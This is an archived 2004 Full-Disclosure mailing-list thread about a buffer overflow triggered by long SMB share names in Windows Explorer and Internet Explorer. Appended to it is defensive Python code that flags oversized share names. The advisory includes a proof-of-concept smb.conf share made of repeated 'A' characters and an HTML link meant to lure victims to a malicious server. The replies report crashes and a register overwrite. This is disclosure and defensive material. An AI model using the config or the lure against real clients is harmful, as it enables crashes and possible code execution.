
View Full Version : Re: [Full-Disclosure] Microsoft's Explorer and Internet Explorer



KF
27/04/04, 22:55
This crashed IE 5.0.3700.1000 on Win2k SP4

Both the EBP and EIP were overwritten with 0x00410041.
ESP holds the Share name as passed by the server.
ESI holds servers.ip\sharename (tolowered)

I guess it's unicode ninjitsu time.

-KF


Milan 't4c' Berger wrote:

> Hello,
>
> I experienced the same as Daniel.
> Windows 2k all hotfixes and patches installed.
> Machine doesn't crash, just gave me the error
> message "share name not found"
>
> Tested on German Windows 2000 Pro SP4/IE6,
> tested with Windows Explorer.
>
>
> Regards,
> Milan
>
>
> Daniel Regalado Arias wrote:
>
>> Well, I have tested it in W2k with SP3 and Explorer
>> didn't crash!!!!!!!
>>
>> Well, I can't get into the share because a message
>> appears saying "share name not found"!!!!
>>
>> But, explorer is OK.
>>
>>
>> --- Rodrigo Gutierrez <rodrigo@intellicomp.cl>
>> wrote:
>>
>>> Sunday afternoon is a bit boring, and weather sucks
>>> down here in Santiago, Chile so here we go...
>>> The vuln is attached in TXT format, I would be
>>> grateful if someone could verify if it affects
>>> Windows 2003 as well.
>>>
>>> Rodrigo.-
>>>
>>> Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow.
>>>
>>>
>>>
>>> Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
>>>
>>> Affected: MS Internet Explorer, MS Explorer
>>> (explorer.exe) Windows XP(All), Windows 2000(All)
>>>
>>> Not Tested: Windows 2003, Windows me, Windows 98,
>>> Windows 95
>>>
>>> Vendor Status: I notified the vendor in the
>>> beginning of 2002; this vulnerability was supposed
>>> to be fixed in XP Service Pack 1 according to the
>>> vendor's Knowledge Base article 322857.
>>>
>>> Vendor url: http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
>>>
>>>
>>> Background.
>>>
>>> MS Explorer (explorer.exe) and MS Internet
>>> Explorer (IEXPLORE.EXE) are core pieces of Microsoft Windows
>>> operating systems.
>>>
>>>
>>>
>>> Description
>>>
>>> Windows fails to handle long share names when
>>> accessing a remote file server such as Samba, allowing a malicious
>>> server to crash the client's Explorer and eventually execute
>>> arbitrary code on the machine as the current user (usually with
>>> Administrator rights on Windows machines).
>>>
>>>
>>>
>>> Analysis
>>>
>>> In order to exploit this, an attacker must be able
>>> to get a user to connect to a malicious server which contains a
>>> share name equal to or longer than 300 characters. Windows won't
>>> allow you to create such a share, but of course Samba includes the
>>> feature ;). After your Samba box is up and running, create a share
>>> in your smb.conf:
>>>
>>>
>>>
>>> #------------ CUT HERE -------------
>>>
>>>
>>> [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
>>> comment = Area 51
>>> path = /tmp/testfolder
>>> public = yes
>>> writable = yes
>>> printable = no
>>> browseable = yes
>>> write list = @trymywingchung
>>>
>>> #------------ CUT HERE -------------
>>>
>>>
>>> After your server is up, just get to your Windows
>>> test box and go to Start menu > Run > \\your.malicious.server.ip.,
>>> plufff, Explorer will crash :).
>>>
>>> Social Engineering:
>>>
>>> <a href="\\my.malicious.server.ip">Enter My 0day
>>> sploit archive</a>
>>>
>>>
>>>
>>> Workaround.
>>>
>>> From your network card settings, disable the Client
>>> for Microsoft Networks until a real fix for this vulnerability is
>>> available.
>>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>
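As an added example (not from the thread or from Samba), a small Python audit that parses smb.conf-style text and flags share sections whose names are long enough to be suspicious before a Samba host offers them to Windows clients, plus the encoding step behind KF's 0x00410041 observation. The 80-character cap and the sample config are assumptions constructed for this check, not values from the advisory.

```python
import re

# Conservative cap for share names (assumption: an administrative limit chosen
# for this audit, not a value from the advisory, which reports crashes at 300+).
MAX_SHARE_NAME_LEN = 80

SECTION_RE = re.compile(r"^\[(.*)\]$")


def parse_smb_conf(text):
    """Parse smb.conf-style text into a list of (section_name, {key: value})."""
    sections = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank line or comment
            continue
        m = SECTION_RE.match(line)
        if m:
            current = (m.group(1).strip(), {})
            sections.append(current)
        elif current is not None and "=" in line:
            key, val = line.split("=", 1)
            current[1][key.strip().lower()] = val.strip()
    return sections


def oversized_shares(text, max_len=MAX_SHARE_NAME_LEN):
    """Names of share sections longer than max_len, excluding [global]."""
    return [name for name, _ in parse_smb_conf(text)
            if name.lower() != "global" and len(name) > max_len]


def utf16le_as_dword(name):
    """First four bytes of the UTF-16LE share name as a little-endian 32-bit
    value: 'AA' gives 0x00410041, the value KF saw in EBP and EIP, which is
    why a 'unicode' overwrite always carries a zero high byte per character."""
    return int.from_bytes(name.encode("utf-16-le")[:4], "little")


# Constructed sample: the advisory's share with the name shortened to 320 'A's.
SAMPLE_CONF = (
    "[global]\n"
    "workgroup = WORKGROUP\n"
    "\n"
    "[" + "A" * 320 + "]\n"
    "comment = Area 51\n"
    "path = /tmp/testfolder\n"
    "browseable = yes\n"
)
```

Running `oversized_shares(SAMPLE_CONF)` returns the 320-character name, and `utf16le_as_dword("AAAA")` returns 0x00410041.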